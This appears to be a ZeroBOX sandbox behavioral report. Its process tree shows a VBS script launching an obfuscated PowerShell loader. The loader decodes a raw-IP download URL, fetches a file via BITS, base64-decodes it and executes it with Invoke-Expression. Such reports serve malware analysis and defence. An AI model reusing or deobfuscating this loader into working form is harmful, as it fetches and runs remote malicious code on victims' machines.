| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Blotlg1NOUSE.vbs

    2568
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Spildedamp9 ([String]$Tilsvi49){For($Murbrk9=1; $Murbrk9 -lt $Tilsvi49.Length-1; $Murbrk9+=(1+1)){$Filecha=$Filecha+$Tilsvi49.Substring($Murbrk9, 1)};$Filecha;}$Setli=Spildedamp9 ' h tHt p :E/C/t1 0T9m.T2s0 6V. 2 4R0T.A6T7G/ xTl oFg /REsm bEu s .Ps ePaP ';$Filecha01=Spildedamp9 'Hi eBx ';$Thurro = Spildedamp9 ' \ svy sPwOo wH6F4B\BWBiUnRd ojw sPPRo w eMr S h eSlFl \UvP1 .T0A\ pDoAw eFr sOhIegl l . eUx eK ';.($Filecha01) (Spildedamp9 'F$ I nKd iScBaEtMo 2P=J$UeVnSvB:Hwdi nUdgiDrA ') ;.($Filecha01) (Spildedamp9 'E$BTshIuFrPr o =U$lICnhdEi c aBtToI2 + $ Tsh u rSrSoS ') ;.($Filecha01) (Spildedamp9 ' $DP uCbNbPeA = B(M(Rg w m iP PwTi n 3 2S_WpFrAoScFe sgsd - F PRr o c eFsBs IMdG=T$N{UPKIAD } )K. CEoAmDm a nSd LGi n e )S s-PsOpOlBiKtI S[Pcbh aIrI]O3p4J ');.($Filecha01) (Spildedamp9 'W$ B aslKd uKrLd d s s=B $ PPu b b eR[ $ PRuKb bVe .ScIo uLnBtD-U2S] ');.($Filecha01) (Spildedamp9 ' $HZRiSo nRiF=U(UTAeRs t -DP aDt hH $FTbhSu r rAo )B -PATn d ( [ IAn t P t rC]O:F:gs i zNeG E-BeCqp D8 ) ') ;if ($Zioni) {.$Thurro $Baldurdds;} else {;$Filecha00=Spildedamp9 'BS t aSrAtI-TB i tLs TErca nXssf e rP -cSgoKuDr c e $DS eBtGlSi U-DDCeWs t iEn a tEiTo n O$ ITn d iTc aGtSoU2H ';.($Filecha01) (Spildedamp9 'J$ IOnEd i c aFtso 2G= $Heun vt: a pUpPdIa tDa ') ;.($Filecha01) (Spildedamp9 ' I mTpFo rTt - M o dbuMlTe VBLiPtTsATRr aRn s f eLrH ') ;$Indicato2=$Indicato2+'\Kanttekste.Nas';while (-not $Raaderumme) {.($Filecha01) (Spildedamp9 'S$TR aSaLd eGr uVm mPeL= ( T eBs t -BP a tTh $KI nHdti c a t oC2s)I ') ;.($Filecha01) $Filecha00;.($Filecha01) (Spildedamp9 'DSStCaOrLt -sSMl eLe pT 5U ');}.($Filecha01) (Spildedamp9 'S$USSp iTlPd eTdRa mSp = G e tS- C o nGtMeRn tG $ IBn dOipc aMtKoN2O ');.($Filecha01) (Spildedamp9 'F$JABkQtSiA E= P[ S y sPtDe mM. C o nDv eVrStS]r:T:SF rVoCm BRaisSe 6 4BSOt r i nSgT(L$BS p iDlOdFe dAa mFpS)P ');.($Filecha01) (Spildedamp9 't$MFSiCl e c hKaA2F U=S G[ SPySs tOe mT. T eMxBt . E nUcSoRdCi nMgD]M:T: ATSLC ITI .eG eJtRSTtBr iMnFgO( $ ARkLtSiS)B ');.($Filecha01) (Spildedamp9 ' $VTDe t r aN=W$ FFi l e cUhFaB2V.Ss u bTsUtOr iEn gH(S1G8 6A5I5C9 ,K1N8D8T4T7F) ');.($Filecha01) $Tetra;}"

      1728

Process contents

No process loaded Click on a process in the tree above to load its data.